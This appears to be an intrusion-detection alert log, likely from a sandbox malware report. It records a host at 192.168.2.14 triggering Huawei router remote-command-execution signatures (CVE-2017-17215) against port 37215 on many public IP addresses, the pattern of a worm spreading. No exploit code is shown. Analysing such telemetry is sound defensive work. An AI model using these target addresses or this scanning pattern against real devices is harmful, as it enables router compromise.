                                                        06/13/24-21:32:50.632843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772837215192.168.2.14156.175.13.127
                                                        06/13/24-21:33:11.177526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684837215192.168.2.14156.236.120.151
                                                        06/13/24-21:33:09.111254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089037215192.168.2.1441.71.169.223
                                                        06/13/24-21:33:00.871960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.1441.197.49.81
                                                        06/13/24-21:32:15.606636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720837215192.168.2.1441.51.194.170
                                                        06/13/24-21:32:01.221027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275637215192.168.2.14156.109.114.102
                                                        06/13/24-21:32:03.298943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473037215192.168.2.14197.190.221.106
                                                        06/13/24-21:32:38.316349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395237215192.168.2.1441.141.176.10
                                                        06/13/24-21:33:07.055908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239237215192.168.2.14197.112.189.11
                                                        06/13/24-21:32:21.787564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731237215192.168.2.14197.209.28.183
                                                        06/13/24-21:32:05.370064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352837215192.168.2.14197.102.25.166
                                                        06/13/24-21:32:54.711950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835837215192.168.2.14156.10.20.51
                                                        06/13/24-21:33:11.155954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952837215192.168.2.14197.231.164.134
                                                        06/13/24-21:32:28.027013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868837215192.168.2.14197.130.215.180
                                                        06/13/24-21:32:23.834638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905237215192.168.2.14156.158.84.97
                                                        06/13/24-21:32:23.940932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946837215192.168.2.1441.237.240.202
                                                        06/13/24-21:32:17.695989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573237215192.168.2.14156.189.122.81
                                                        06/13/24-21:32:58.824107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571637215192.168.2.14197.1.23.134
                                                        06/13/24-21:32:52.657484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899437215192.168.2.1441.35.238.17
                                                        06/13/24-21:33:00.867739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774437215192.168.2.1441.153.29.225
                                                        06/13/24-21:33:09.091193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322237215192.168.2.14197.213.161.185
                                                        06/13/24-21:32:15.611217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4217037215192.168.2.14156.194.165.106
                                                        06/13/24-21:32:44.480028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14156.165.244.72
                                                        06/13/24-21:32:03.275917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727837215192.168.2.1441.8.89.25
                                                        06/13/24-21:31:57.092676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822637215192.168.2.14197.225.49.66
                                                        06/13/24-21:32:23.941743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862437215192.168.2.1441.208.9.52
                                                        06/13/24-21:33:09.086821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019637215192.168.2.14197.38.38.33
                                                        06/13/24-21:32:48.553467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190837215192.168.2.14197.247.64.49
                                                        06/13/24-21:33:15.251922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570637215192.168.2.1441.33.155.82
                                                        06/13/24-21:32:36.266338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212037215192.168.2.1441.58.52.107
                                                        06/13/24-21:33:00.872560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173237215192.168.2.14197.25.185.231
                                                        06/13/24-21:32:05.376218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3733437215192.168.2.14156.121.137.185
                                                        06/13/24-21:33:15.276216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621237215192.168.2.1441.103.194.245
                                                        06/13/24-21:32:09.439621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586437215192.168.2.1441.136.162.222
                                                        06/13/24-21:32:32.165497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965237215192.168.2.14197.0.78.10
                                                        06/13/24-21:32:03.306269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656437215192.168.2.14156.114.244.226
                                                        06/13/24-21:32:19.749903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368837215192.168.2.1441.245.156.73
                                                        06/13/24-21:32:07.420337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988637215192.168.2.14156.203.103.29
                                                        06/13/24-21:32:28.043500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961237215192.168.2.1441.81.90.40
                                                        06/13/24-21:32:40.357654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796237215192.168.2.1441.99.186.100
                                                        06/13/24-21:32:56.758777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454037215192.168.2.14197.234.128.51
                                                        06/13/24-21:32:03.276043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015837215192.168.2.14197.86.69.163
                                                        06/13/24-21:32:11.486425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397837215192.168.2.14156.131.13.19
                                                        06/13/24-21:32:21.803432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935637215192.168.2.14197.51.190.7
                                                        06/13/24-21:33:09.090010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187837215192.168.2.1441.9.118.144
                                                        06/13/24-21:32:54.725944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119437215192.168.2.14156.76.250.145
                                                        06/13/24-21:33:15.274965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129037215192.168.2.14197.210.81.30
                                                        06/13/24-21:32:21.802661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781037215192.168.2.14197.11.201.86
                                                        06/13/24-21:32:30.128013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727637215192.168.2.14197.22.53.55
                                                        06/13/24-21:32:38.302594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.14156.126.29.214
                                                        06/13/24-21:32:05.343482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731837215192.168.2.14156.64.242.3
                                                        06/13/24-21:33:09.110176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763637215192.168.2.14197.34.183.238
                                                        06/13/24-21:32:15.638300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330837215192.168.2.14197.220.85.172
                                                        06/13/24-21:32:30.080028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812837215192.168.2.14197.252.101.14
                                                        06/13/24-21:32:30.127825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503237215192.168.2.14156.7.246.70
                                                        06/13/24-21:33:13.229378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476437215192.168.2.1441.24.188.203
                                                        06/13/24-21:32:32.171468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070437215192.168.2.14156.239.241.6
                                                        06/13/24-21:32:05.377521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067237215192.168.2.1441.156.51.242
                                                        06/13/24-21:32:56.756560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490037215192.168.2.1441.141.200.181
                                                        06/13/24-21:32:34.217007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694637215192.168.2.1441.183.254.143
                                                        06/13/24-21:32:48.555752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359637215192.168.2.14156.247.133.239
                                                        06/13/24-21:32:32.170353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012037215192.168.2.14197.32.126.9
                                                        06/13/24-21:32:40.357976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511437215192.168.2.1441.11.255.71
                                                        06/13/24-21:33:15.252880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688037215192.168.2.14156.103.122.98
                                                        06/13/24-21:33:09.112312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771637215192.168.2.14156.71.119.55
                                                        06/13/24-21:32:01.239090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257437215192.168.2.14156.15.191.127
                                                        06/13/24-21:32:23.943014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492637215192.168.2.14197.107.28.243
                                                        06/13/24-21:31:57.137753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5051437215192.168.2.1441.148.32.215
                                                        06/13/24-21:31:59.177457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547437215192.168.2.1441.83.124.1
                                                        06/13/24-21:32:52.679712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397437215192.168.2.14156.157.135.95
                                                        06/13/24-21:33:07.040309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838637215192.168.2.14156.191.214.58
                                                        06/13/24-21:32:09.440601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445037215192.168.2.14197.227.189.239
                                                        06/13/24-21:32:23.931955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874837215192.168.2.1441.4.153.245
                                                        06/13/24-21:32:34.213975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873637215192.168.2.1441.180.12.108
                                                        06/13/24-21:32:30.124408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337437215192.168.2.1441.65.249.83
                                                        06/13/24-21:32:09.439416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702237215192.168.2.1441.49.97.115
                                                        06/13/24-21:33:15.271923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690437215192.168.2.14156.5.163.146
                                                        06/13/24-21:32:05.378487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223637215192.168.2.14156.78.253.178
                                                        06/13/24-21:32:23.944124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488437215192.168.2.14156.9.191.135
                                                        06/13/24-21:32:58.824249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001837215192.168.2.14197.184.33.158
                                                        06/13/24-21:32:42.403138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741437215192.168.2.14156.71.117.156
                                                        06/13/24-21:31:57.093545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292637215192.168.2.1441.226.92.240
                                                        06/13/24-21:32:56.785820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154437215192.168.2.1441.57.119.57
                                                        06/13/24-21:32:11.488241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935037215192.168.2.14197.243.216.19
                                                        06/13/24-21:32:40.372891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804237215192.168.2.14156.91.74.239
                                                        06/13/24-21:32:11.505677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843437215192.168.2.14197.201.89.59
                                                        06/13/24-21:32:30.098547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135837215192.168.2.14156.217.71.38
                                                        06/13/24-21:31:57.093098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569437215192.168.2.1441.66.135.68
                                                        06/13/24-21:32:19.749768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288837215192.168.2.14197.167.194.35
                                                        06/13/24-21:32:58.824159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200637215192.168.2.14197.252.115.159
                                                        06/13/24-21:32:38.320409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144437215192.168.2.14197.75.74.43
                                                        06/13/24-21:31:59.200284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570637215192.168.2.14156.167.30.215
                                                        06/13/24-21:33:15.274767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373637215192.168.2.14197.183.227.174
                                                        06/13/24-21:32:07.417869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738437215192.168.2.14156.214.208.156
                                                        06/13/24-21:32:48.553888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980037215192.168.2.1441.58.64.4
                                                        06/13/24-21:33:02.936507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476437215192.168.2.1441.51.197.144
                                                        06/13/24-21:32:01.238961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804837215192.168.2.14197.84.189.45
                                                        06/13/24-21:33:02.908739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850437215192.168.2.14197.136.79.139
                                                        06/13/24-21:32:13.544580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030237215192.168.2.1441.73.49.33
                                                        06/13/24-21:32:48.567520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459237215192.168.2.14197.235.128.248
                                                        06/13/24-21:32:50.612059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706637215192.168.2.14156.105.210.236
                                                        06/13/24-21:32:07.404601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5962837215192.168.2.14197.34.21.202
                                                        06/13/24-21:32:23.835140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057637215192.168.2.14156.58.236.133
                                                        06/13/24-21:32:38.321066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639037215192.168.2.1441.193.127.44
                                                        06/13/24-21:32:50.612240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005437215192.168.2.1441.236.66.125
                                                        06/13/24-21:32:28.046214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322437215192.168.2.14156.5.40.42
                                                        06/13/24-21:31:57.129992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624637215192.168.2.14156.221.191.162
                                                        06/13/24-21:32:11.485787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147437215192.168.2.14156.219.14.156
                                                        06/13/24-21:32:52.655843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711437215192.168.2.14197.255.34.234
                                                        06/13/24-21:32:03.274762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951637215192.168.2.14197.9.246.39
                                                        06/13/24-21:32:03.277467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805837215192.168.2.14156.100.103.80
                                                        06/13/24-21:32:48.567846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965037215192.168.2.1441.132.230.75
                                                        06/13/24-21:32:05.346833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802037215192.168.2.1441.115.180.24
                                                        06/13/24-21:32:17.694531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502437215192.168.2.14197.28.102.8
                                                        06/13/24-21:32:21.786904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729237215192.168.2.14197.122.61.68
                                                        06/13/24-21:32:23.830482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825637215192.168.2.1441.103.70.148
                                                        06/13/24-21:32:52.676023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115437215192.168.2.14156.254.129.243
                                                        06/13/24-21:32:30.074491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811037215192.168.2.14197.9.24.127
                                                        06/13/24-21:33:09.107609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601037215192.168.2.14156.8.58.97
                                                        06/13/24-21:33:17.306365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812237215192.168.2.14156.128.232.25
                                                        06/13/24-21:32:21.802070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895637215192.168.2.1441.149.21.88
                                                        06/13/24-21:32:23.833215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355437215192.168.2.1441.254.188.218
                                                        06/13/24-21:32:03.279503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187037215192.168.2.1441.153.95.121
                                                        06/13/24-21:33:09.111308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276837215192.168.2.14197.184.211.34
                                                        06/13/24-21:32:09.438330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033037215192.168.2.14197.129.120.22
                                                        06/13/24-21:32:36.247475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435637215192.168.2.14197.189.58.2
                                                        06/13/24-21:33:15.259315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118237215192.168.2.14156.12.77.5
                                                        06/13/24-21:32:05.347396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939637215192.168.2.14197.17.178.219
                                                        06/13/24-21:32:05.344210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588037215192.168.2.14197.192.255.92
                                                        06/13/24-21:33:02.910373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806237215192.168.2.1441.162.1.74
                                                        06/13/24-21:31:59.196774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865237215192.168.2.14156.51.238.240
                                                        06/13/24-21:32:28.028572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356637215192.168.2.14156.222.128.233
                                                        06/13/24-21:31:59.195645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386037215192.168.2.1441.38.41.192
                                                        06/13/24-21:32:40.357222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446837215192.168.2.1441.15.22.97
                                                        06/13/24-21:33:09.109356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895637215192.168.2.14156.239.207.93
                                                        06/13/24-21:33:17.306916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532437215192.168.2.14197.63.111.78
                                                        06/13/24-21:32:05.369348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962837215192.168.2.14156.58.204.162
                                                        06/13/24-21:33:13.210799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505237215192.168.2.1441.119.100.112
                                                        06/13/24-21:33:15.271708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721637215192.168.2.14197.101.150.90
                                                        06/13/24-21:32:13.545229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936237215192.168.2.1441.115.239.222
                                                        06/13/24-21:32:07.415987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352437215192.168.2.14197.211.53.92
                                                        06/13/24-21:33:13.212071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282037215192.168.2.14197.117.105.213
                                                        06/13/24-21:32:11.487351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382437215192.168.2.1441.243.214.182
                                                        06/13/24-21:33:11.157234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679437215192.168.2.1441.109.43.104
                                                        06/13/24-21:33:15.275646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241837215192.168.2.14156.98.154.218
                                                        06/13/24-21:32:15.629144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754637215192.168.2.14156.97.101.152
                                                        06/13/24-21:32:34.216717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210237215192.168.2.14197.6.60.3
                                                        06/13/24-21:32:50.614536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185437215192.168.2.14197.191.8.47
                                                        06/13/24-21:32:54.710321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356237215192.168.2.1441.133.169.122
                                                        06/13/24-21:33:02.908057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662637215192.168.2.14156.96.246.20
                                                        06/13/24-21:33:15.259270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529637215192.168.2.14197.245.193.85
                                                        06/13/24-21:33:15.274687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871837215192.168.2.14156.67.84.212
                                                        06/13/24-21:32:09.457111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079837215192.168.2.1441.51.228.233
                                                        06/13/24-21:32:48.554310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934237215192.168.2.14156.198.144.84
                                                        06/13/24-21:33:11.176516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101237215192.168.2.14197.159.228.160
                                                        06/13/24-21:32:11.486558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164237215192.168.2.14156.34.47.183
                                                        06/13/24-21:32:17.695455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4281037215192.168.2.14156.214.240.122
                                                        06/13/24-21:32:13.568355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801837215192.168.2.14156.232.248.195
                                                        06/13/24-21:32:15.632645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.1441.119.97.240
                                                        06/13/24-21:32:01.222581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870437215192.168.2.14156.151.238.12
                                                        06/13/24-21:32:09.457346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019237215192.168.2.1441.103.32.153
                                                        06/13/24-21:32:58.838355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172437215192.168.2.14156.184.182.93
                                                        06/13/24-21:31:57.131778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230637215192.168.2.14197.87.109.131
                                                        06/13/24-21:32:54.707218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.1441.6.124.149
                                                        06/13/24-21:32:09.459028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222437215192.168.2.14156.74.249.253
                                                        06/13/24-21:32:13.567744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796637215192.168.2.14156.250.1.218
                                                        06/13/24-21:32:21.783048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788437215192.168.2.14156.216.164.224
                                                        06/13/24-21:32:11.509336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304637215192.168.2.14156.159.213.51
                                                        06/13/24-21:33:09.125760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298437215192.168.2.14156.186.242.123
                                                        06/13/24-21:32:13.546068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3415637215192.168.2.14197.116.46.148
                                                        06/13/24-21:32:17.676962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795637215192.168.2.14156.172.62.242
                                                        06/13/24-21:33:07.039137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502037215192.168.2.14156.189.197.192
                                                        06/13/24-21:32:42.420551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579037215192.168.2.1441.172.164.6
                                                        06/13/24-21:33:09.113793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185237215192.168.2.1441.117.34.54
                                                        06/13/24-21:33:15.276433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721037215192.168.2.14197.158.238.168
                                                        06/13/24-21:32:23.941669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114437215192.168.2.14156.25.119.67
                                                        06/13/24-21:32:07.417334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047037215192.168.2.1441.33.127.167
                                                        06/13/24-21:32:25.974925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076037215192.168.2.14156.132.127.248
                                                        06/13/24-21:32:21.804700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946437215192.168.2.14156.57.248.207
                                                        06/13/24-21:31:57.091995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699437215192.168.2.14197.197.243.183
                                                        06/13/24-21:33:11.155436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040437215192.168.2.14197.134.9.143
                                                        06/13/24-21:31:57.132565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5569437215192.168.2.1441.58.29.177
                                                        06/13/24-21:32:50.630543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842037215192.168.2.14156.58.112.104
                                                        06/13/24-21:33:07.060701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295437215192.168.2.14197.130.228.0
                                                        06/13/24-21:32:58.841142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020637215192.168.2.1441.105.219.171
                                                        06/13/24-21:33:17.310479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357037215192.168.2.14197.200.114.202
